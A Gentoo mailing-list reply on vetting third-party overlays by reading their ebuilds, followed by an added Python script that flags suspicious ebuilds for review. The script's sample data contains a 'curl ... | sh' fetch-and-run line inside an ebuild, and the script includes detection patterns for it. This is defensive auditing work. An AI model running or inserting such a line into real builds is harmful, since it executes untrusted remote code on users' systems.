On 06/08/2015 03:27, James wrote:
> OK so yes I know overlays in the wild can be disastrous.
> Reading the devmanual while parsing through various ebuilds
> both portage and in the wild, does make for some interesting
> reading:: ymmv.
> 
> I'm not sure my overlay (kung_fu) is complete.
> 
> 
> 'layman -L'  lists reasonably qualified overlay sites; but you
> have to add them to search out their content directly.
> 
> 'eix -R <keywordname>' will search far and wide for a given
> overlay; like the distributed database 'cassandra'.
> 
> Some googling suggests that zugaina contains a master list of overlays?
> (not sure how true this is).
> 
> I'm not sure if 'eix -R' or 'browsing zugaina' provides the widest possible
>  list of (mostly safe) overlay sites.
> 
> Last, googling for the name + ebuild  or overlay can find packages,
> but if the archive (git etc) is not listed with a layman -L:: be
> very cautious.... audit the details of the overlay.
> 
> Specifically, on dev-db/cassandra I find 2.1.3 and 2.12
> ([5] "spike-community-overlay" layman/spike-community-overlay)
> 
> but the cassandra.apache.org site shows 2.1.8 and 2.20 as the
> stable and testing downloads currently available. So is it safe
> to use the "spike-community" overlay as a basis to update the cassandra
> ebuild I have available?  
> 
> In general, is there a list (even a private list) of known good/bad
> actors on these overlay sites?
> 
> 
> Any further tidbits on searching out and qualifying overlays (yes
> I know only a full code audit is actually safe) that folks use
> or would suggest would be keen. I did see some gentoo wiki pages on the
> subject but they seem terse or dated.


To find Joe Random Hacker's overlay and see what's in it, I tend to
browse zugaina. Coverage is decent and most stuff from most folks active
in the Gentoo ecosystem is there.

If an overlay is not listed on zugaina, these days it tends to be on
github or similar. I usually just do a git checkout and cast my own
eyeballs over the ebuilds. If I'm happy, import into layman (I think
it's -o) with the xml file that should be provided.

Thus far I've had good success. As with everything else in Gentoo it's
buyer beware, and train your eyeballs and brain beforehand. There does
not seem to be an easy shortcut.


-- 
Alan McKinnon
[email protected]
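
A way to speed up the "git checkout and cast my own eyeballs over the ebuilds" step described above, as an added example that is not part of the original message: a Python triage pass over a checked-out overlay that flags ebuilds deserving a close read before the overlay is imported into layman. The heuristics, function names and the sample overlay are assumptions constructed for this example; a flag means "read this one carefully", not "malicious".

```python
import re
import tempfile
from pathlib import Path

# Heuristics chosen for this example (assumptions, not a Gentoo policy).
LIVE_ECLASSES = {"git-r3", "git-2", "subversion", "mercurial"}
PATTERNS = {
    "network fetch outside SRC_URI": re.compile(r"^\s*(wget|curl|git\s+clone)\b", re.M),
    "downloaded or decoded data piped to a shell": re.compile(r"\|\s*(ba)?sh\b"),
}

def triage_ebuild(path):
    """Return the review flags raised by one ebuild file."""
    text = path.read_text(errors="replace")
    inherited = set(" ".join(re.findall(r"^inherit\s+(.+)$", text, re.M)).split())
    flags = []
    if "9999" in path.stem or inherited & LIVE_ECLASSES:
        # Live ebuilds build whatever upstream HEAD is at merge time.
        flags.append("live ebuild: unpinned upstream, no Manifest checksum")
    elif "SRC_URI" in text and not (path.parent / "Manifest").exists():
        flags.append("SRC_URI set but no Manifest in package directory")
    flags += [name for name, rx in PATTERNS.items() if rx.search(text)]
    return flags

def triage_overlay(root):
    """Map each flagged ebuild (path relative to the overlay root) to its flags."""
    root = Path(root)
    found = ((e.relative_to(root).as_posix(), triage_ebuild(e))
             for e in sorted(root.glob("*/*/*.ebuild")))
    return {rel: flags for rel, flags in found if flags}

def build_sample_overlay(root):
    """Constructed sample data: three tiny ebuilds in a throwaway overlay tree."""
    samples = {
        "dev-db/foo/foo-1.0.ebuild": 'EAPI=5\nSRC_URI="https://example.org/foo-1.0.tar.gz"\n',
        "dev-db/bar/bar-9999.ebuild": 'EAPI=5\ninherit git-r3\nEGIT_REPO_URI="https://example.org/bar.git"\n',
        "app-misc/baz/baz-2.0.ebuild": 'EAPI=5\nSRC_URI="https://example.org/baz-2.0.tar.gz"\n'
                                       'src_prepare() {\n\tcurl https://example.org/x | sh\n}\n',
    }
    for rel, body in samples.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True)
        path.write_text(body)
    Path(root, "dev-db/foo/Manifest").write_text("DIST foo-1.0.tar.gz 1 SHA256 00\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_overlay(tmp)
        print(triage_overlay(tmp))
```

Point `triage_overlay()` at the directory of the git checkout; ebuilds that raise no flag still need the manual read the message describes.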

